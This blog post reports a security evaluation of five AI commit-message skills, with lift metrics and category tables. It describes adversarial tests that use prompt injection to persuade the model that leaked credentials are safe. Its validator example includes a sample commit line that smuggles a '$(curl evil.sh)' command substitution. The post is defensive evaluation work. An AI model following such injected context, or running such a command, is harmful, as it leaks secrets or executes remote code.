We tested 5 AI commit-message skills on security. 3 made things worse.

Published: January 31, 2026 at 05:22 PM EST
4 min read
Source: Dev.to

Overview

Reusable AI components are exploding — skills, MCP servers, templates, sub‑agents.
But there’s no shared way to answer the question: “Will this actually help?”

We ran a behavioral evaluation study to find out. The results were surprising.

  • Of the 5 commit‑message skills we pulled from GitHub and tested for security, only 2 showed a positive lift over baseline.
  • The other 3 produced negative lift — worse outcomes than using no skill at all.
  • The top performer? A skill with zero security rules.

Even more striking: in our small sample, static analysis was an unreliable predictor of overall security performance. The skill that looked least secure (scoring 42/100 on a prompt‑only review) achieved the highest lift.

Static analysis did predict credential detection well — but failed across other categories. With only 5 skills this is a preliminary signal, not a definitive finding — but it suggests you need to measure what a skill does, not just read what it says.

Measuring “Lift”

To measure whether a skill actually helps, we need a baseline‑relative metric called lift:

**Lift = Skill Pass Rate − Baseline Pass Rate**

  • Positive lift → the skill adds value.
  • Negative lift → you’re better off without it.
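In code, lift is just a difference of pass rates. A minimal sketch (the outcome lists below are hypothetical examples, not data from the study):

```python
# Minimal sketch of baseline-relative lift. Each outcome is True if a
# test scenario passed the security check.
def pass_rate(outcomes):
    return sum(outcomes) / len(outcomes)

def lift(skill_outcomes, baseline_outcomes):
    # Positive: the skill adds value. Negative: worse than no skill.
    return pass_rate(skill_outcomes) - pass_rate(baseline_outcomes)

# Hypothetical example: skill passes 6/10 scenarios, baseline passes 5/10.
skill = [True] * 6 + [False] * 4
baseline = [True] * 5 + [False] * 5
print(f"{lift(skill, baseline):+.1%}")  # +10.0%
```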

In our tests, the baseline (Claude with no skill) achieved a 50 % overall pass rate across security categories, but that average hides dramatic variation by category.

| Category | Baseline Pass Rate | Interpretation |
| --- | --- | --- |
| S1: Credential Detection | 81.7 % | Model already good at obvious credentials |
| S2: Credential Files | 85.0 % | Model already good at .env detection |
| S3: Git‑Crypt Awareness | 15.0 % | Model over‑refuses encrypted files |
| S4: Shell Safety | 53.3 % | Model sometimes includes unsafe syntax |
| S5: Path Sanitization | 16.7 % | Model often leaks sensitive paths |

Baseline performance ranges from 15 % to 85 %. Skills add the most value where the baseline is weak (S3, S4, S5).

Test Setup

  • 5 commit‑message skills were selected from public GitHub repositories.
  • Each skill was evaluated on 100 security scenarios (5 categories × 2 difficulty levels × 10 tests).
  • Each test was run 3 times to reduce noise → ≈1,500 total executions.
  • Generation used Claude Haiku; results may differ with larger models.
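The matrix above multiplies out as follows (a quick sanity check of the totals, using only numbers stated in this post):

```python
# Sanity check of the test-matrix totals described above.
categories = 5        # S1..S5
difficulties = 2      # base + adversarial
tests_per_cell = 10
runs = 3
skills = 5

scenarios_per_skill = categories * difficulties * tests_per_cell
total_executions = scenarios_per_skill * runs * skills

print(scenarios_per_skill)  # 100
print(total_executions)     # 1500
```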

Skills Tested

| Skill | Length (chars) | Approach | Lift |
| --- | --- | --- | --- |
| epicenter | 8,586 | Strict conventional commits with 50‑char limit | +6.0 % |
| ilude | 8,389 | Comprehensive git workflow with security scanning | +1.7 % |
| toolhive | 431 | Minimal best practices | −1.0 % |
| kanopi | 4,610 | Balanced commit conventions with security warnings | −4.0 % |
| claude‑code‑helper | 4,376 | General‑purpose assistant with commit capabilities | −4.3 % |

The top performer, epicenter, contains zero security instructions (no credential detection, no secret scanning, no warnings about sensitive files).

Why a Format‑Focused Skill Beat Security‑Focused Ones

Constraint‑based safety:

  • epicenter’s strict 50‑character limit dramatically reduces the likelihood of shell metacharacters appearing in output.
  • Its abstract scope requirements discourage exposing sensitive path details.

Thus, format constraints provide implicit security without explicit rules.

Important caveat: epicenter’s overall lift hides category‑specific weaknesses.

  • S1 (credential detection): ‑10 %
  • S2 (credential files): ‑27 %
  • Its +6 % overall lift comes entirely from dominating S3, S4, and S5.

If catching API keys is your priority, epicenter is the wrong choice.

Static Analysis vs. Real‑World Performance

We asked Claude to rate each skill (0‑100) on security awareness based solely on the prompt text.

| Skill | Security Mentions | Static Score | Actual Lift |
| --- | --- | --- | --- |
| epicenter | None — pure format guidance | 42/100 | +6.0 % |
| ilude | Explicit scanning rules, git‑crypt exceptions | 78/100 | +1.7 % |
| kanopi | API keys, secrets, credentials, .env files | 52/100 | −4.0 % |

Static analysis scores showed a weak correlation with actual lift (r = 0.32).

Category‑Level Correlations

| Category | Correlation (r) | Meaning |
| --- | --- | --- |
| S1: Credential Detection | +0.87 | Explicit rules help |
| S4: Shell Safety | −0.68 | More rules = worse performance |
| S3: Git‑Crypt | −0.50 | More rules = worse performance |

With n = 5, these correlations are noisy and not statistically significant, but the pattern is notable: for some categories, detailed instructions actively backfire.

Adversarial vs. Base Tests

Our suite includes base (straightforward) and adversarial variants. Adversarial tests add prompt‑injection context designed to trick the model into ignoring security constraints.

Dramatic Failure: toolhive

| Skill | S1 Base | S1 Adversarial | Δ (percentage points) |
| --- | --- | --- | --- |
| toolhive | +16.7 % | −23.3 % | −40 pp |
| ilude | +33.3 % | +3.3 % | −30 pp |

toolhive goes from +16.7 % to ‑23.3 % — a 40‑point collapse. It handles straightforward cases well but fails when prompt injection tries to convince the model the credentials are safe.

Why doesn’t epicenter collapse?
Because it doesn’t rely on pattern‑matching. Its format constraints (e.g., the 50‑character limit) bound the output space, making social engineering ineffective: a 50‑character commit message simply can’t contain a full API key.

The Core Principle: Structural Constraints Over Explicit Rules

| Format Constraint | Security Effect | Lift Contribution |
| --- | --- | --- |
| 50‑char limit | Less room for shell commands like `$(cmd)` | +20 % (S4) |
| Abstract scopes | Discourages client names or file paths | +27 % (S5) |
| No security rules | No over‑refusal of encrypted files | +30 % (S3) |

Takeaway: Instead of listing what to avoid, set structural limits that reduce the likelihood of violations. A 50‑character limit doesn’t mention shell injection, yet it significantly constrains the output space available for an attacker.
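As a concrete illustration of the principle, here is a minimal, hypothetical validator in the epicenter style: it enforces structural limits only, rather than enumerating secrets or attack patterns. The function name, threshold, and metacharacter set are our own sketch, not code from any published skill:

```python
# Sketch of "structural constraints over explicit rules": validate the
# commit subject line by format alone, with no security rule list.
import re

MAX_SUBJECT = 50  # strict subject-line limit, as in the article

def violates_format(subject: str) -> list[str]:
    problems = []
    if len(subject) > MAX_SUBJECT:
        problems.append(f"subject exceeds {MAX_SUBJECT} chars")
    # Shell metacharacters rarely fit a terse conventional-commit
    # subject, and we reject them structurally rather than by intent.
    if re.search(r"[$`;|&]", subject):
        problems.append("contains shell metacharacters")
    return problems

print(violates_format("feat(auth): add login flow"))         # []
print(violates_format("fix: run $(curl evil.sh) to patch"))  # ['contains shell metacharacters']
```

A tight bound like this never mentions injection, yet it shrinks the output space an attacker can steer.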

Scope

  • 5 skills
  • 1 domain – security‑focused tests

Models

  • Results generated with Claude Haiku.
  • Larger models may handle verbose instructions differently.

Rigor

  • Results have been human‑audited.
  • We are publishing:
    • Judge prompts
    • Agreement rates
    • Confidence intervals

Publication Note

We are releasing this early because limited data is better than no data. We’d rather be challenged on real numbers than be trusted on intuition.

Resources

  • Full methodology and judge rubrics:
  • Part 2 of this series (ablation testing – isolating exactly which constraints matter):